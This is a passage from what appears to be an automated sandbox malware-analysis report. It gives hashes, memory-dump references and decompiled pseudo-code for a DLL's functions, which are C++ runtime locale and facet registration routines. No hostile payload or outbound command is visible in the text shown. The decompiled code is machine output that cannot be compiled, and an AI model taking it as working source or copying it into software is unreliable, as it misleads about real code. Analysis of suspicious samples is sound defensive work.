Instruction Fuzzy Hash: 41215870A08209AFDF14DB1CC490FAA7BF4EB16359F198158E845CB36AC731DE818BC1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48777F, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6D48777F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				intOrPtr _v0;
				signed int _v4;
				void* _v16;
				char _v20;
				char _v32;
				void* _t19;
				intOrPtr* _t20;
				intOrPtr* _t42;
				void* _t50;

				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653( &_v20, 0);
				_t50 =  *0x6d546c10; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t50;
				_t19 = E6D46161C(0x6d546b2c);
				_t38 = _a8;
				_t20 = E6D46171B(_a8, _t19);
				_t48 = _t20;
				if(_t20 != 0) {
					L5:
					E6D4866BA( &_v20);
					return E6D4A0075(_t48);
				} else {
					if(_t50 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6D487E4C(__ebx, _t38, __edx, _t48, _t50) - 0xffffffff;
						if(__eflags == 0) {
							_t42 =  &_v32;
							E6D461438(_t42);
							E6D4A3D74( &_v32, 0x6d543504);
							asm("int3");
							 *_t42 = _v0;
							return _t42;
						} else {
							_t48 = _v16;
							_v16 = _t48;
							_v4 = 1;
							E6D486FD3(__eflags, _t48);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t48 + 4))))();
							 *0x6d546c10 = _t48;
							goto L5;
						}
					} else {
						_t48 = _t50;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6D487786
std::_Lockit::_Lockit.LIBCPMT ref: 6D487790
int.LIBCPMT ref: 6D4877A7

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

codecvt.LIBCPMT ref: 6D4877CA
std::_Facet_Register.LIBCPMT ref: 6D4877E1
std::_Lockit::~_Lockit.LIBCPMT ref: 6D487801
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48781F

Strings

,kTm, xrefs: 6D48779B

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
String ID: ,kTm
API String ID: 2594415655-1660317422
Opcode ID: 595939b3325d80c460828f8437d902800d1fc973c76e3dfd8be1a619ecf32615
Instruction ID: 0a46911ae70374ded11d20da0889841a6f50322ae0144f2b4c7c03f7d77723b0
Opcode Fuzzy Hash: 595939b3325d80c460828f8437d902800d1fc973c76e3dfd8be1a619ecf32615
Instruction Fuzzy Hash: C711B175E082199BCF05EB64C850EEDB7B5AF94314F2A4408E511A7391DFB0ED01CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48EEEB, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6D48EEEB(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t321;
				signed int _t322;
				void* _t334;
				void* _t347;
				void* _t360;
				void* _t373;
				void* _t386;
				void* _t399;
				void* _t412;
				void* _t425;
				void* _t438;
				void* _t451;
				void* _t464;
				void* _t477;
				void* _t490;
				void* _t503;
				void* _t516;
				void* _t529;
				void* _t542;
				void* _t555;
				void* _t568;
				void* _t581;
				void* _t594;
				signed int _t853;
				signed int _t923;
				signed int _t924;
				signed int _t925;
				signed int _t926;
				signed int _t927;
				signed int _t928;
				signed int _t929;
				signed int _t930;
				signed int _t931;
				signed int _t932;
				signed int _t933;
				signed int _t934;
				signed int _t935;
				signed int _t936;
				signed int _t937;
				signed int _t938;
				signed int _t939;
				signed int _t940;
				signed int _t941;
				signed int _t942;
				signed int _t943;
				signed int _t945;
				signed int _t946;
				signed int _t947;
				signed int _t948;
				signed int _t949;
				signed int _t950;
				signed int _t951;
				signed int _t952;
				signed int _t953;
				signed int _t954;
				signed int _t955;
				signed int _t956;
				signed int _t957;
				signed int _t958;
				signed int _t959;
				signed int _t960;
				signed int _t961;
				signed int _t962;
				signed int _t963;
				signed int _t964;
				signed int _t965;
				signed int _t966;
				signed int _t967;
				void* _t990;

				_t920 = __edx;
				_t699 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t990 - 0x14, 0);
				_t945 =  *0x6d546e04; // 0x0
				 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
				 *(_t990 - 0x10) = _t945;
				_t321 = E6D46161C(0x6d546b30);
				_t702 =  *((intOrPtr*)(_t990 + 8));
				_t322 = E6D46171B( *((intOrPtr*)(_t990 + 8)), _t321);
				_t922 = _t322;
				if(_t322 != 0) {
					L5:
					E6D4866BA(_t990 - 0x14);
					return E6D4A0075(_t922);
				} else {
					if(_t945 == 0) {
						_push( *((intOrPtr*)(_t990 + 8)));
						_push(_t990 - 0x10);
						__eflags = E6D490C9D(__ebx, _t702, __edx, _t922, _t945) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438(_t990 - 0x20);
							E6D4A3D74(_t990 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t922, _t945, 0x14);
							E6D486653(_t990 - 0x14, 0);
							_t946 =  *0x6d546de4; // 0x0
							 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
							 *(_t990 - 0x10) = _t946;
							_t334 = E6D46161C(0x6d546d90);
							_t709 =  *((intOrPtr*)(_t990 + 8));
							_t923 = E6D46171B( *((intOrPtr*)(_t990 + 8)), _t334);
							__eflags = _t923;
							if(_t923 != 0) {
								L12:
								E6D4866BA(_t990 - 0x14);
								return E6D4A0075(_t923);
							} else {
								__eflags = _t946;
								if(_t946 == 0) {
									_push( *((intOrPtr*)(_t990 + 8)));
									_push(_t990 - 0x10);
									__eflags = E6D490D03(_t699, _t709, __edx, _t923, _t946) - 0xffffffff;
									if(__eflags == 0) {
										E6D461438(_t990 - 0x20);
										E6D4A3D74(_t990 - 0x20, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e83cf, _t699, _t923, _t946, 0x14);
										E6D486653(_t990 - 0x14, 0);
										_t947 =  *0x6d546db4; // 0x0
										 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
										 *(_t990 - 0x10) = _t947;
										_t347 = E6D46161C(0x6d546d68);
										_t716 =  *((intOrPtr*)(_t990 + 8));
										_t924 = E6D46171B( *((intOrPtr*)(_t990 + 8)), _t347);
										__eflags = _t924;
										if(_t924 != 0) {
											L19:
											E6D4866BA(_t990 - 0x14);
											return E6D4A0075(_t924);
										} else {
											__eflags = _t947;
											if(_t947 == 0) {
												_push( *((intOrPtr*)(_t990 + 8)));
												_push(_t990 - 0x10);
												__eflags = E6D490DA5(_t699, _t716, __edx, _t924, _t947) - 0xffffffff;
												if(__eflags == 0) {
													E6D461438(_t990 - 0x20);
													E6D4A3D74(_t990 - 0x20, 0x6d543504);
													asm("int3");
													E6D4A00AC(0x6d4e83cf, _t699, _t924, _t947, 0x14);
													E6D486653(_t990 - 0x14, 0);
													_t948 =  *0x6d546dd4; // 0x0
													 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
													 *(_t990 - 0x10) = _t948;
													_t360 = E6D46161C(0x6d546b28);
													_t723 =  *((intOrPtr*)(_t990 + 8));
													_t925 = E6D46171B( *((intOrPtr*)(_t990 + 8)), _t360);
													__eflags = _t925;
													if(_t925 != 0) {
														L26:
														E6D4866BA(_t990 - 0x14);
														return E6D4A0075(_t925);
													} else {
														__eflags = _t948;
														if(_t948 == 0) {
															_push( *((intOrPtr*)(_t990 + 8)));
															_push(_t990 - 0x10);
															__eflags = E6D490E47(_t699, _t723, _t920, _t925, _t948) - 0xffffffff;
															if(__eflags == 0) {
																E6D461438(_t990 - 0x20);
																E6D4A3D74(_t990 - 0x20, 0x6d543504);
																asm("int3");
																E6D4A00AC(0x6d4e83cf, _t699, _t925, _t948, 0x14);
																E6D486653(_t990 - 0x14, 0);
																_t949 =  *0x6d546de8; // 0x0
																 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																 *(_t990 - 0x10) = _t949;
																_t373 = E6D46161C(0x6d546d94);
																_t730 =  *((intOrPtr*)(_t990 + 8));
																_t926 = E6D46171B( *((intOrPtr*)(_t990 + 8)), _t373);
																__eflags = _t926;
																if(_t926 != 0) {
																	L33:
																	E6D4866BA(_t990 - 0x14);
																	return E6D4A0075(_t926);
																} else {
																	__eflags = _t949;
																	if(_t949 == 0) {
																		_push( *((intOrPtr*)(_t990 + 8)));
																		_push(_t990 - 0x10);
																		__eflags = E6D490EB7(_t699, _t730, _t920, _t926, _t949) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D461438(_t990 - 0x20);
																			E6D4A3D74(_t990 - 0x20, 0x6d543504);
																			asm("int3");
																			E6D4A00AC(0x6d4e83cf, _t699, _t926, _t949, 0x14);
																			E6D486653(_t990 - 0x14, 0);
																			_t950 =  *0x6d546db8; // 0x0
																			 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																			 *(_t990 - 0x10) = _t950;
																			_t386 = E6D46161C(0x6d546d6c);
																			_t737 =  *((intOrPtr*)(_t990 + 8));
																			_t927 = E6D46171B( *((intOrPtr*)(_t990 + 8)), _t386);
																			__eflags = _t927;
																			if(_t927 != 0) {
																				L40:
																				E6D4866BA(_t990 - 0x14);
																				return E6D4A0075(_t927);
																			} else {
																				__eflags = _t950;
																				if(_t950 == 0) {
																					_push( *((intOrPtr*)(_t990 + 8)));
																					_push(_t990 - 0x10);
																					__eflags = E6D490F1F(_t699, _t737, _t920, _t927, _t950) - 0xffffffff;
																					if(__eflags == 0) {
																						E6D461438(_t990 - 0x20);
																						E6D4A3D74(_t990 - 0x20, 0x6d543504);
																						asm("int3");
																						E6D4A00AC(0x6d4e83cf, _t699, _t927, _t950, 0x14);
																						E6D486653(_t990 - 0x14, 0);
																						_t951 =  *0x6d546dec; // 0x0
																						 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																						 *(_t990 - 0x10) = _t951;
																						_t399 = E6D46161C(0x6d546d98);
																						_t744 =  *((intOrPtr*)(_t990 + 8));
																						_t928 = E6D46171B( *((intOrPtr*)(_t990 + 8)), _t399);
																						__eflags = _t928;
																						if(_t928 != 0) {
																							L47:
																							E6D4866BA(_t990 - 0x14);
																							return E6D4A0075(_t928);
																						} else {
																							__eflags = _t951;
																							if(_t951 == 0) {
																								_push( *((intOrPtr*)(_t990 + 8)));
																								_push(_t990 - 0x10);
																								__eflags = E6D490F87(_t699, _t744, _t920, _t928, _t951) - 0xffffffff;
																								if(__eflags == 0) {
																									E6D461438(_t990 - 0x20);
																									E6D4A3D74(_t990 - 0x20, 0x6d543504);
																									asm("int3");
																									E6D4A00AC(0x6d4e83cf, _t699, _t928, _t951, 0x14);
																									E6D486653(_t990 - 0x14, 0);
																									_t952 =  *0x6d546dbc; // 0x0
																									 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																									 *(_t990 - 0x10) = _t952;
																									_t412 = E6D46161C(0x6d546d70);
																									_t751 =  *((intOrPtr*)(_t990 + 8));
																									_t929 = E6D46171B( *((intOrPtr*)(_t990 + 8)), _t412);
																									__eflags = _t929;
																									if(_t929 != 0) {
																										L54:
																										E6D4866BA(_t990 - 0x14);
																										return E6D4A0075(_t929);
																									} else {
																										__eflags = _t952;
																										if(_t952 == 0) {
																											_push( *((intOrPtr*)(_t990 + 8)));
																											_push(_t990 - 0x10);
																											__eflags = E6D490FEF(_t699, _t751, _t920, _t929, _t952) - 0xffffffff;
																											if(__eflags == 0) {
																												E6D461438(_t990 - 0x20);
																												E6D4A3D74(_t990 - 0x20, 0x6d543504);
																												asm("int3");
																												E6D4A00AC(0x6d4e83cf, _t699, _t929, _t952, 0x14);
																												E6D486653(_t990 - 0x14, 0);
																												_t953 =  *0x6d546df0; // 0x0
																												 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																												 *(_t990 - 0x10) = _t953;
																												_t425 = E6D46161C(0x6d546d9c);
																												_t758 =  *((intOrPtr*)(_t990 + 8));
																												_t930 = E6D46171B( *((intOrPtr*)(_t990 + 8)), _t425);
																												__eflags = _t930;
																												if(_t930 != 0) {
																													L61:
																													E6D4866BA(_t990 - 0x14);
																													return E6D4A0075(_t930);
																												} else {
																													__eflags = _t953;
																													if(_t953 == 0) {
																														_push( *((intOrPtr*)(_t990 + 8)));
																														_push(_t990 - 0x10);
																														__eflags = E6D491057(_t699, _t758, _t920, _t930, _t953) - 0xffffffff;
																														if(__eflags == 0) {
																															E6D461438(_t990 - 0x20);
																															E6D4A3D74(_t990 - 0x20, 0x6d543504);
																															asm("int3");
																															E6D4A00AC(0x6d4e83cf, _t699, _t930, _t953, 0x14);
																															E6D486653(_t990 - 0x14, 0);
																															_t954 =  *0x6d546dc0; // 0x0
																															 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																															 *(_t990 - 0x10) = _t954;
																															_t438 = E6D46161C(0x6d546d74);
																															_t765 =  *((intOrPtr*)(_t990 + 8));
																															_t931 = E6D46171B( *((intOrPtr*)(_t990 + 8)), _t438);
																															__eflags = _t931;
																															if(_t931 != 0) {
																																L68:
																																E6D4866BA(_t990 - 0x14);
																																return E6D4A0075(_t931);
																															} else {
																																__eflags = _t954;
																																if(_t954 == 0) {
																																	_push( *((intOrPtr*)(_t990 + 8)));
																																	_push(_t990 - 0x10);
																																	__eflags = E6D4910BF(_t699, _t765, _t920, _t931, _t954) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6D461438(_t990 - 0x20);
																																		E6D4A3D74(_t990 - 0x20, 0x6d543504);
																																		asm("int3");
																																		E6D4A00AC(0x6d4e83cf, _t699, _t931, _t954, 0x14);
																																		E6D486653(_t990 - 0x14, 0);
																																		_t955 =  *0x6d546df8; // 0x0
																																		 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																		 *(_t990 - 0x10) = _t955;
																																		_t451 = E6D46161C(0x6d546da4);
																																		_t772 =  *((intOrPtr*)(_t990 + 8));
																																		_t932 = E6D46171B( *((intOrPtr*)(_t990 + 8)), _t451);
																																		__eflags = _t932;
																																		if(_t932 != 0) {
																																			L75:
																																			E6D4866BA(_t990 - 0x14);
																																			return E6D4A0075(_t932);
																																		} else {
																																			__eflags = _t955;
																																			if(_t955 == 0) {
																																				_push( *((intOrPtr*)(_t990 + 8)));
																																				_push(_t990 - 0x10);
																																				__eflags = E6D491127(_t699, _t772, _t920, _t932, _t955) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6D461438(_t990 - 0x20);
																																					E6D4A3D74(_t990 - 0x20, 0x6d543504);
																																					asm("int3");
																																					E6D4A00AC(0x6d4e83cf, _t699, _t932, _t955, 0x14);
																																					E6D486653(_t990 - 0x14, 0);
																																					_t956 =  *0x6d546df4; // 0x0
																																					 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																					 *(_t990 - 0x10) = _t956;
																																					_t464 = E6D46161C(0x6d546da0);
																																					_t779 =  *((intOrPtr*)(_t990 + 8));
																																					_t933 = E6D46171B( *((intOrPtr*)(_t990 + 8)), _t464);
																																					__eflags = _t933;
																																					if(_t933 != 0) {
																																						L82:
																																						E6D4866BA(_t990 - 0x14);
																																						return E6D4A0075(_t933);
																																					} else {
																																						__eflags = _t956;
																																						if(_t956 == 0) {
																																							_push( *((intOrPtr*)(_t990 + 8)));
																																							_push(_t990 - 0x10);
																																							__eflags = E6D4911AB(_t699, _t779, _t920, _t933, _t956) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6D461438(_t990 - 0x20);
																																								E6D4A3D74(_t990 - 0x20, 0x6d543504);
																																								asm("int3");
																																								E6D4A00AC(0x6d4e83cf, _t699, _t933, _t956, 0x14);
																																								E6D486653(_t990 - 0x14, 0);
																																								_t957 =  *0x6d546dc8; // 0x0
																																								 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																								 *(_t990 - 0x10) = _t957;
																																								_t477 = E6D46161C(0x6d546d7c);
																																								_t786 =  *((intOrPtr*)(_t990 + 8));
																																								_t934 = E6D46171B( *((intOrPtr*)(_t990 + 8)), _t477);
																																								__eflags = _t934;
																																								if(_t934 != 0) {
																																									L89:
																																									E6D4866BA(_t990 - 0x14);
																																									return E6D4A0075(_t934);
																																								} else {
																																									__eflags = _t957;
																																									if(_t957 == 0) {
																																										_push( *((intOrPtr*)(_t990 + 8)));
																																										_push(_t990 - 0x10);
																																										__eflags = E6D491230(_t699, _t786, _t920, _t934, _t957) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6D461438(_t990 - 0x20);
																																											E6D4A3D74(_t990 - 0x20, 0x6d543504);
																																											asm("int3");
																																											E6D4A00AC(0x6d4e83cf, _t699, _t934, _t957, 0x14);
																																											E6D486653(_t990 - 0x14, 0);
																																											_t958 =  *0x6d546dc4; // 0x0
																																											 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																											 *(_t990 - 0x10) = _t958;
																																											_t490 = E6D46161C(0x6d546d78);
																																											_t793 =  *((intOrPtr*)(_t990 + 8));
																																											_t935 = E6D46171B( *((intOrPtr*)(_t990 + 8)), _t490);
																																											__eflags = _t935;
																																											if(_t935 != 0) {
																																												L96:
																																												E6D4866BA(_t990 - 0x14);
																																												return E6D4A0075(_t935);
																																											} else {
																																												__eflags = _t958;
																																												if(_t958 == 0) {
																																													_push( *((intOrPtr*)(_t990 + 8)));
																																													_push(_t990 - 0x10);
																																													__eflags = E6D4912B4(_t699, _t793, _t920, _t935, _t958) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6D461438(_t990 - 0x20);
																																														E6D4A3D74(_t990 - 0x20, 0x6d543504);
																																														asm("int3");
																																														E6D4A00AC(0x6d4e83cf, _t699, _t935, _t958, 0x14);
																																														E6D486653(_t990 - 0x14, 0);
																																														_t959 =  *0x6d546dd8; // 0x0
																																														 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																														 *(_t990 - 0x10) = _t959;
																																														_t503 = E6D46161C(0x6d546d84);
																																														_t800 =  *((intOrPtr*)(_t990 + 8));
																																														_t936 = E6D46171B( *((intOrPtr*)(_t990 + 8)), _t503);
																																														__eflags = _t936;
																																														if(_t936 != 0) {
																																															L103:
																																															E6D4866BA(_t990 - 0x14);
																																															return E6D4A0075(_t936);
																																														} else {
																																															__eflags = _t959;
																																															if(_t959 == 0) {
																																																_push( *((intOrPtr*)(_t990 + 8)));
																																																_push(_t990 - 0x10);
																																																__eflags = E6D491339(_t699, _t800, _t920, _t936, _t959) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6D461438(_t990 - 0x20);
																																																	E6D4A3D74(_t990 - 0x20, 0x6d543504);
																																																	asm("int3");
																																																	E6D4A00AC(0x6d4e83cf, _t699, _t936, _t959, 0x14);
																																																	E6D486653(_t990 - 0x14, 0);
																																																	_t960 =  *0x6d546db0; // 0x0
																																																	 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																	 *(_t990 - 0x10) = _t960;
																																																	_t516 = E6D46161C(0x6d546d64);
																																																	_t807 =  *((intOrPtr*)(_t990 + 8));
																																																	_t937 = E6D46171B( *((intOrPtr*)(_t990 + 8)), _t516);
																																																	__eflags = _t937;
																																																	if(_t937 != 0) {
																																																		L110:
																																																		E6D4866BA(_t990 - 0x14);
																																																		return E6D4A0075(_t937);
																																																	} else {
																																																		__eflags = _t960;
																																																		if(_t960 == 0) {
																																																			_push( *((intOrPtr*)(_t990 + 8)));
																																																			_push(_t990 - 0x10);
																																																			__eflags = E6D4913A1(_t699, _t807, _t920, _t937, _t960) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6D461438(_t990 - 0x20);
																																																				E6D4A3D74(_t990 - 0x20, 0x6d543504);
																																																				asm("int3");
																																																				E6D4A00AC(0x6d4e83cf, _t699, _t937, _t960, 0x14);
																																																				E6D486653(_t990 - 0x14, 0);
																																																				_t961 =  *0x6d546ddc; // 0x0
																																																				 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																				 *(_t990 - 0x10) = _t961;
																																																				_t529 = E6D46161C(0x6d546d88);
																																																				_t814 =  *((intOrPtr*)(_t990 + 8));
																																																				_t938 = E6D46171B( *((intOrPtr*)(_t990 + 8)), _t529);
																																																				__eflags = _t938;
																																																				if(_t938 != 0) {
																																																					L117:
																																																					E6D4866BA(_t990 - 0x14);
																																																					return E6D4A0075(_t938);
																																																				} else {
																																																					__eflags = _t961;
																																																					if(_t961 == 0) {
																																																						_push( *((intOrPtr*)(_t990 + 8)));
																																																						_push(_t990 - 0x10);
																																																						__eflags = E6D491409(_t699, _t814, _t920, _t938, _t961) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							E6D461438(_t990 - 0x20);
																																																							E6D4A3D74(_t990 - 0x20, 0x6d543504);
																																																							asm("int3");
																																																							E6D4A00AC(0x6d4e83cf, _t699, _t938, _t961, 0x14);
																																																							E6D486653(_t990 - 0x14, 0);
																																																							_t962 =  *0x6d546de0; // 0x0
																																																							 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																							 *(_t990 - 0x10) = _t962;
																																																							_t542 = E6D46161C(0x6d546d8c);
																																																							_t821 =  *((intOrPtr*)(_t990 + 8));
																																																							_t939 = E6D46171B( *((intOrPtr*)(_t990 + 8)), _t542);
																																																							__eflags = _t939;
																																																							if(_t939 != 0) {
																																																								L124:
																																																								E6D4866BA(_t990 - 0x14);
																																																								return E6D4A0075(_t939);
																																																							} else {
																																																								__eflags = _t962;
																																																								if(_t962 == 0) {
																																																									_push( *((intOrPtr*)(_t990 + 8)));
																																																									_push(_t990 - 0x10);
																																																									__eflags = E6D491471(_t699, _t821, _t920, _t939, _t962) - 0xffffffff;
																																																									if(__eflags == 0) {
																																																										E6D461438(_t990 - 0x20);
																																																										E6D4A3D74(_t990 - 0x20, 0x6d543504);
																																																										asm("int3");
																																																										E6D4A00AC(0x6d4e83cf, _t699, _t939, _t962, 0x14);
																																																										E6D486653(_t990 - 0x14, 0);
																																																										_t963 =  *0x6d546dfc; // 0x0
																																																										 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																										 *(_t990 - 0x10) = _t963;
																																																										_t555 = E6D46161C(0x6d546da8);
																																																										_t828 =  *((intOrPtr*)(_t990 + 8));
																																																										_t940 = E6D46171B( *((intOrPtr*)(_t990 + 8)), _t555);
																																																										__eflags = _t940;
																																																										if(_t940 != 0) {
																																																											L131:
																																																											E6D4866BA(_t990 - 0x14);
																																																											return E6D4A0075(_t940);
																																																										} else {
																																																											__eflags = _t963;
																																																											if(_t963 == 0) {
																																																												_push( *((intOrPtr*)(_t990 + 8)));
																																																												_push(_t990 - 0x10);
																																																												__eflags = E6D4914EC(_t699, _t828, _t920, _t940, _t963) - 0xffffffff;
																																																												if(__eflags == 0) {
																																																													E6D461438(_t990 - 0x20);
																																																													E6D4A3D74(_t990 - 0x20, 0x6d543504);
																																																													asm("int3");
																																																													E6D4A00AC(0x6d4e83cf, _t699, _t940, _t963, 0x14);
																																																													E6D486653(_t990 - 0x14, 0);
																																																													_t964 =  *0x6d546dcc; // 0x0
																																																													 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																													 *(_t990 - 0x10) = _t964;
																																																													_t568 = E6D46161C(0x6d546d80);
																																																													_t835 =  *((intOrPtr*)(_t990 + 8));
																																																													_t941 = E6D46171B( *((intOrPtr*)(_t990 + 8)), _t568);
																																																													__eflags = _t941;
																																																													if(_t941 != 0) {
																																																														L138:
																																																														E6D4866BA(_t990 - 0x14);
																																																														return E6D4A0075(_t941);
																																																													} else {
																																																														__eflags = _t964;
																																																														if(_t964 == 0) {
																																																															_push( *((intOrPtr*)(_t990 + 8)));
																																																															_push(_t990 - 0x10);
																																																															__eflags = E6D491558(_t699, _t835, _t920, _t941, _t964) - 0xffffffff;
																																																															if(__eflags == 0) {
																																																																E6D461438(_t990 - 0x20);
																																																																E6D4A3D74(_t990 - 0x20, 0x6d543504);
																																																																asm("int3");
																																																																E6D4A00AC(0x6d4e83cf, _t699, _t941, _t964, 0x14);
																																																																E6D486653(_t990 - 0x14, 0);
																																																																_t965 =  *0x6d546e00; // 0x0
																																																																 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																																 *(_t990 - 0x10) = _t965;
																																																																_t581 = E6D46161C(0x6d546dac);
																																																																_t842 =  *((intOrPtr*)(_t990 + 8));
																																																																_t942 = E6D46171B( *((intOrPtr*)(_t990 + 8)), _t581);
																																																																__eflags = _t942;
																																																																if(_t942 != 0) {
																																																																	L145:
																																																																	E6D4866BA(_t990 - 0x14);
																																																																	return E6D4A0075(_t942);
																																																																} else {
																																																																	__eflags = _t965;
																																																																	if(_t965 == 0) {
																																																																		_push( *((intOrPtr*)(_t990 + 8)));
																																																																		_push(_t990 - 0x10);
																																																																		__eflags = E6D4915C4(_t699, _t842, _t920, _t942, _t965) - 0xffffffff;
																																																																		if(__eflags == 0) {
																																																																			E6D461438(_t990 - 0x20);
																																																																			E6D4A3D74(_t990 - 0x20, 0x6d543504);
																																																																			asm("int3");
																																																																			E6D4A00AC(0x6d4e83cf, _t699, _t942, _t965, 0x14);
																																																																			E6D486653(_t990 - 0x14, 0);
																																																																			_t966 =  *0x6d546dd0; // 0x0
																																																																			 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																																			 *(_t990 - 0x10) = _t966;
																																																																			_t594 = E6D46161C(0x6d546d60);
																																																																			_t849 =  *((intOrPtr*)(_t990 + 8));
																																																																			_t943 = E6D46171B( *((intOrPtr*)(_t990 + 8)), _t594);
																																																																			__eflags = _t943;
																																																																			if(_t943 != 0) {
																																																																				L152:
																																																																				E6D4866BA(_t990 - 0x14);
																																																																				return E6D4A0075(_t943);
																																																																			} else {
																																																																				__eflags = _t966;
																																																																				if(_t966 == 0) {
																																																																					_push( *((intOrPtr*)(_t990 + 8)));
																																																																					_push(_t990 - 0x10);
																																																																					__eflags = E6D49162A(_t699, _t849, _t920, _t943, _t966) - 0xffffffff;
																																																																					if(__eflags == 0) {
																																																																						_t853 = _t990 - 0x20;
																																																																						E6D461438(_t853);
																																																																						E6D4A3D74(_t990 - 0x20, 0x6d543504);
																																																																						asm("int3");
																																																																						E6D4A00AC(0x6d4e851f, _t699, _t943, _t966, 4);
																																																																						_t967 = _t853;
																																																																						 *(_t990 - 0x10) = _t967;
																																																																						 *((intOrPtr*)(_t967 + 4)) =  *((intOrPtr*)(_t990 + 0xc));
																																																																						_push( *((intOrPtr*)(_t990 + 0x14)));
																																																																						_t315 = _t990 - 4;
																																																																						 *_t315 =  *(_t990 - 4) & 0x00000000;
																																																																						__eflags =  *_t315;
																																																																						 *_t967 = 0x6d4ec0c4;
																																																																						 *((char*)(_t967 + 0x28)) =  *((intOrPtr*)(_t990 + 0x10));
																																																																						E6D49542F(_t699, _t853, _t920, _t943, _t967,  *_t315);
																																																																						return E6D4A0075(_t967,  *((intOrPtr*)(_t990 + 8)));
																																																																					} else {
																																																																						_t943 =  *(_t990 - 0x10);
																																																																						 *(_t990 - 0x10) = _t943;
																																																																						 *(_t990 - 4) = 1;
																																																																						E6D486FD3(__eflags, _t943);
																																																																						 *0x6d4ea26c();
																																																																						 *((intOrPtr*)( *((intOrPtr*)( *_t943 + 4))))();
																																																																						 *0x6d546dd0 = _t943;
																																																																						goto L152;
																																																																					}
																																																																				} else {
																																																																					_t943 = _t966;
																																																																					goto L152;
																																																																				}
																																																																			}
																																																																		} else {
																																																																			_t942 =  *(_t990 - 0x10);
																																																																			 *(_t990 - 0x10) = _t942;
																																																																			 *(_t990 - 4) = 1;
																																																																			E6D486FD3(__eflags, _t942);
																																																																			 *0x6d4ea26c();
																																																																			 *((intOrPtr*)( *((intOrPtr*)( *_t942 + 4))))();
																																																																			 *0x6d546e00 = _t942;
																																																																			goto L145;
																																																																		}
																																																																	} else {
																																																																		_t942 = _t965;
																																																																		goto L145;
																																																																	}
																																																																}
																																																															} else {
																																																																_t941 =  *(_t990 - 0x10);
																																																																 *(_t990 - 0x10) = _t941;
																																																																 *(_t990 - 4) = 1;
																																																																E6D486FD3(__eflags, _t941);
																																																																 *0x6d4ea26c();
																																																																 *((intOrPtr*)( *((intOrPtr*)( *_t941 + 4))))();
																																																																 *0x6d546dcc = _t941;
																																																																goto L138;
																																																															}
																																																														} else {
																																																															_t941 = _t964;
																																																															goto L138;
																																																														}
																																																													}
																																																												} else {
																																																													_t940 =  *(_t990 - 0x10);
																																																													 *(_t990 - 0x10) = _t940;
																																																													 *(_t990 - 4) = 1;
																																																													E6D486FD3(__eflags, _t940);
																																																													 *0x6d4ea26c();
																																																													 *((intOrPtr*)( *((intOrPtr*)( *_t940 + 4))))();
																																																													 *0x6d546dfc = _t940;
																																																													goto L131;
																																																												}
																																																											} else {
																																																												_t940 = _t963;
																																																												goto L131;
																																																											}
																																																										}
																																																									} else {
																																																										_t939 =  *(_t990 - 0x10);
